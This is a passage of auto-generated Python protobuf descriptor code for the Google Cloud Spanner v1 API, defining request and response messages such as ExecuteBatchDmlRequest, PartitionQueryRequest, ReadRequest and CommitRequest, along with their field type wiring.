_EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY = _descriptor.Descriptor(
name="ParamTypesEntry",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement.ParamTypesEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement.ParamTypesEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement.ParamTypesEntry.value",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2167,
serialized_end=2241,
)
_EXECUTEBATCHDMLREQUEST_STATEMENT = _descriptor.Descriptor(
name="Statement",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="sql",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement.sql",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="params",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement.params",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="param_types",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement.param_types",
index=2,
number=3,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2540,
serialized_end=2771,
)
_EXECUTEBATCHDMLREQUEST = _descriptor.Descriptor(
name="ExecuteBatchDmlRequest",
full_name="google.spanner.v1.ExecuteBatchDmlRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.transaction",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="statements",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.statements",
index=2,
number=3,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="seqno",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.seqno",
index=3,
number=4,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_EXECUTEBATCHDMLREQUEST_STATEMENT],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2292,
serialized_end=2771,
)
_EXECUTEBATCHDMLRESPONSE = _descriptor.Descriptor(
name="ExecuteBatchDmlResponse",
full_name="google.spanner.v1.ExecuteBatchDmlResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="result_sets",
full_name="google.spanner.v1.ExecuteBatchDmlResponse.result_sets",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="status",
full_name="google.spanner.v1.ExecuteBatchDmlResponse.status",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2773,
serialized_end=2885,
)
_PARTITIONOPTIONS = _descriptor.Descriptor(
name="PartitionOptions",
full_name="google.spanner.v1.PartitionOptions",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="partition_size_bytes",
full_name="google.spanner.v1.PartitionOptions.partition_size_bytes",
index=0,
number=1,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="max_partitions",
full_name="google.spanner.v1.PartitionOptions.max_partitions",
index=1,
number=2,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2887,
serialized_end=2959,
)
_PARTITIONQUERYREQUEST_PARAMTYPESENTRY = _descriptor.Descriptor(
name="ParamTypesEntry",
full_name="google.spanner.v1.PartitionQueryRequest.ParamTypesEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.spanner.v1.PartitionQueryRequest.ParamTypesEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.spanner.v1.PartitionQueryRequest.ParamTypesEntry.value",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2167,
serialized_end=2241,
)
_PARTITIONQUERYREQUEST = _descriptor.Descriptor(
name="PartitionQueryRequest",
full_name="google.spanner.v1.PartitionQueryRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.PartitionQueryRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction",
full_name="google.spanner.v1.PartitionQueryRequest.transaction",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="sql",
full_name="google.spanner.v1.PartitionQueryRequest.sql",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="params",
full_name="google.spanner.v1.PartitionQueryRequest.params",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="param_types",
full_name="google.spanner.v1.PartitionQueryRequest.param_types",
index=4,
number=5,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="partition_options",
full_name="google.spanner.v1.PartitionQueryRequest.partition_options",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_PARTITIONQUERYREQUEST_PARAMTYPESENTRY],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2962,
serialized_end=3381,
)
_PARTITIONREADREQUEST = _descriptor.Descriptor(
name="PartitionReadRequest",
full_name="google.spanner.v1.PartitionReadRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.PartitionReadRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction",
full_name="google.spanner.v1.PartitionReadRequest.transaction",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="table",
full_name="google.spanner.v1.PartitionReadRequest.table",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="index",
full_name="google.spanner.v1.PartitionReadRequest.index",
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="columns",
full_name="google.spanner.v1.PartitionReadRequest.columns",
index=4,
number=5,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="key_set",
full_name="google.spanner.v1.PartitionReadRequest.key_set",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="partition_options",
full_name="google.spanner.v1.PartitionReadRequest.partition_options",
index=6,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3384,
serialized_end=3689,
)
_PARTITION = _descriptor.Descriptor(
name="Partition",
full_name="google.spanner.v1.Partition",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="partition_token",
full_name="google.spanner.v1.Partition.partition_token",
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3691,
serialized_end=3727,
)
_PARTITIONRESPONSE = _descriptor.Descriptor(
name="PartitionResponse",
full_name="google.spanner.v1.PartitionResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="partitions",
full_name="google.spanner.v1.PartitionResponse.partitions",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction",
full_name="google.spanner.v1.PartitionResponse.transaction",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3729,
serialized_end=3851,
)
_READREQUEST = _descriptor.Descriptor(
name="ReadRequest",
full_name="google.spanner.v1.ReadRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.ReadRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction",
full_name="google.spanner.v1.ReadRequest.transaction",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="table",
full_name="google.spanner.v1.ReadRequest.table",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="index",
full_name="google.spanner.v1.ReadRequest.index",
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="columns",
full_name="google.spanner.v1.ReadRequest.columns",
index=4,
number=5,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="key_set",
full_name="google.spanner.v1.ReadRequest.key_set",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="limit",
full_name="google.spanner.v1.ReadRequest.limit",
index=6,
number=8,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="resume_token",
full_name="google.spanner.v1.ReadRequest.resume_token",
index=7,
number=9,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="partition_token",
full_name="google.spanner.v1.ReadRequest.partition_token",
index=8,
number=10,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3854,
serialized_end=4153,
)
_BEGINTRANSACTIONREQUEST = _descriptor.Descriptor(
name="BeginTransactionRequest",
full_name="google.spanner.v1.BeginTransactionRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.BeginTransactionRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="options",
full_name="google.spanner.v1.BeginTransactionRequest.options",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=4156,
serialized_end=4299,
)
_COMMITREQUEST = _descriptor.Descriptor(
name="CommitRequest",
full_name="google.spanner.v1.CommitRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.CommitRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction_id",
full_name="google.spanner.v1.CommitRequest.transaction_id",
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="single_use_transaction",
full_name="google.spanner.v1.CommitRequest.single_use_transaction",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="mutations",
full_name="google.spanner.v1.CommitRequest.mutations",
index=3,
number=4,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="transaction",
full_name="google.spanner.v1.CommitRequest.transaction",
index=0,
containing_type=None,
fields=[],
)
],
serialized_start=4302,
serialized_end=4536,
)
_COMMITRESPONSE = _descriptor.Descriptor(
name="CommitResponse",
full_name="google.spanner.v1.CommitResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="commit_timestamp",
full_name="google.spanner.v1.CommitResponse.commit_timestamp",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=4538,
serialized_end=4608,
)
_ROLLBACKREQUEST = _descriptor.Descriptor(
name="RollbackRequest",
full_name="google.spanner.v1.RollbackRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.RollbackRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction_id",
full_name="google.spanner.v1.RollbackRequest.transaction_id",
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=4610,
serialized_end=4713,
)
_CREATESESSIONREQUEST.fields_by_name["session"].message_type = _SESSION
_BATCHCREATESESSIONSREQUEST.fields_by_name["session_template"].message_type = _SESSION
_BATCHCREATESESSIONSRESPONSE.fields_by_name["session"].message_type = _SESSION
_SESSION_LABELSENTRY.containing_type = _SESSION
_SESSION.fields_by_name["labels"].message_type = _SESSION_LABELSENTRY
_SESSION.fields_by_name[
"create_time"
].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_SESSION.fields_by_name[
"approximate_last_use_time"
].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_LISTSESSIONSRESPONSE.fields_by_name["sessions"].message_type = _SESSION
_EXECUTESQLREQUEST_QUERYOPTIONS.containing_type = _EXECUTESQLREQUEST
_EXECUTESQLREQUEST_PARAMTYPESENTRY.fields_by_name[
"value"
].message_type = google_dot_cloud_dot_spanner__v1_dot_proto_dot_type__pb2._TYPE
_EXECUTESQLREQUEST_PARAMTYPESENTRY.containing_type = _EXECUTESQLREQUEST
_EXECUTESQLREQUEST.fields_by_name[
"transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONSELECTOR
)
_EXECUTESQLREQUEST.fields_by_name[
"params"
].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_EXECUTESQLREQUEST.fields_by_name[
"param_types"
].message_type = _EXECUTESQLREQUEST_PARAMTYPESENTRY
_EXECUTESQLREQUEST.fields_by_name["query_mode"].enum_type = _EXECUTESQLREQUEST_QUERYMODE
_EXECUTESQLREQUEST.fields_by_name[
"query_options"
].message_type = _EXECUTESQLREQUEST_QUERYOPTIONS
_EXECUTESQLREQUEST_QUERYMODE.containing_type = _EXECUTESQLREQUEST
_EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY.fields_by_name[
"value"
].message_type = google_dot_cloud_dot_spanner__v1_dot_proto_dot_type__pb2._TYPE
_EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY.containing_type = (
_EXECUTEBATCHDMLREQUEST_STATEMENT
)
_EXECUTEBATCHDMLREQUEST_STATEMENT.fields_by_name[
"params"
].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_EXECUTEBATCHDMLREQUEST_STATEMENT.fields_by_name[
"param_types"
].message_type = _EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY
_EXECUTEBATCHDMLREQUEST_STATEMENT.containing_type = _EXECUTEBATCHDMLREQUEST
_EXECUTEBATCHDMLREQUEST.fields_by_name[
"transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONSELECTOR
)
_EXECUTEBATCHDMLREQUEST.fields_by_name[
"statements"
].message_type = _EXECUTEBATCHDMLREQUEST_STATEMENT
_EXECUTEBATCHDMLRESPONSE.fields_by_name[
"result_sets"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2._RESULTSET
)
_EXECUTEBATCHDMLRESPONSE.fields_by_name[
"status"
].message_type = google_dot_rpc_dot_status__pb2._STATUS
_PARTITIONQUERYREQUEST_PARAMTYPESENTRY.fields_by_name[
"value"
].message_type = google_dot_cloud_dot_spanner__v1_dot_proto_dot_type__pb2._TYPE
_PARTITIONQUERYREQUEST_PARAMTYPESENTRY.containing_type = _PARTITIONQUERYREQUEST
_PARTITIONQUERYREQUEST.fields_by_name[
"transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONSELECTOR
)
_PARTITIONQUERYREQUEST.fields_by_name[
"params"
].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_PARTITIONQUERYREQUEST.fields_by_name[
"param_types"
].message_type = _PARTITIONQUERYREQUEST_PARAMTYPESENTRY
_PARTITIONQUERYREQUEST.fields_by_name[
"partition_options"
].message_type = _PARTITIONOPTIONS
_PARTITIONREADREQUEST.fields_by_name[
"transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONSELECTOR
)
_PARTITIONREADREQUEST.fields_by_name[
"key_set"
].message_type = google_dot_cloud_dot_spanner__v1_dot_proto_dot_keys__pb2._KEYSET
_PARTITIONREADREQUEST.fields_by_name[
"partition_options"
].message_type = _PARTITIONOPTIONS
_PARTITIONRESPONSE.fields_by_name["partitions"].message_type = _PARTITION
_PARTITIONRESPONSE.fields_by_name[
"transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTION
)
_READREQUEST.fields_by_name[
"transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONSELECTOR
)
_READREQUEST.fields_by_name[
"key_set"
].message_type = google_dot_cloud_dot_spanner__v1_dot_proto_dot_keys__pb2._KEYSET
_BEGINTRANSACTIONREQUEST.fields_by_name[
"options"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONOPTIONS
)
_COMMITREQUEST.fields_by_name[
"single_use_transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONOPTIONS
)
_COMMITREQUEST.fields_by_name[
"mutations"
].message_type = google_dot_cloud_dot_spanner__v1_dot_proto_dot_mutation__pb2._MUTATION
_COMMITREQUEST.oneofs_by_name["transaction"].fields.append(
_COMMITREQUEST.fields_by_name["transaction_id"]
)
_COMMITREQUEST.fields_by_name[
"transaction_id"
].containing_oneof = _COMMITREQUEST.oneofs_by_name["transaction"]
_COMMITREQUEST.oneofs_by_name["transaction"].fields.append(
_COMMITREQUEST.fields_by_name["single_use_transaction"]
)
_COMMITREQUEST.fields_by_name[
"single_use_transaction"
].containing_oneof = _COMMITREQUEST.oneofs_by_name["transaction"]
_COMMITRESPONSE.fields_by_name[
"commit_timestamp"
].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
DESCRIPTOR.message_types_by_name["CreateSessionRequest"] = _CREATESESSIONREQUEST
DESCRIPTOR.message_types_by_name[
"BatchCreateSessionsRequest"
] = _BATCHCREATESESSIONSREQUEST
DESCRIPTOR.message_types_by_name[
"BatchCreateSessionsResponse"
] = _BATCHCREATESESSIONSRESPONSE
DESCRIPTOR.message_types_by_name["Session"] = _SESSION
DESCRIPTOR.message_types_by_name["GetSessionRequest"] = _GETSESSIONREQUEST
DESCRIPTOR.message_types_by_name["ListSessionsRequest"] = _LISTSESSIONSREQUEST
DESCRIPTOR.message_types_by_name["ListSessionsResponse"] = _LISTSESSIONSRESPONSE
DESCRIPTOR.message_types_by_name["DeleteSessionRequest"] = _DELETESESSIONREQUEST
DESCRIPTOR.message_types_by_name["ExecuteSqlRequest"] = _EXECUTESQLREQUEST
DESCRIPTOR.message_types_by_name["ExecuteBatchDmlRequest"] = _EXECUTEBATCHDMLREQUEST
DESCRIPTOR.message_types_by_name["ExecuteBatchDmlResponse"] = _EXECUTEBATCHDMLRESPONSE
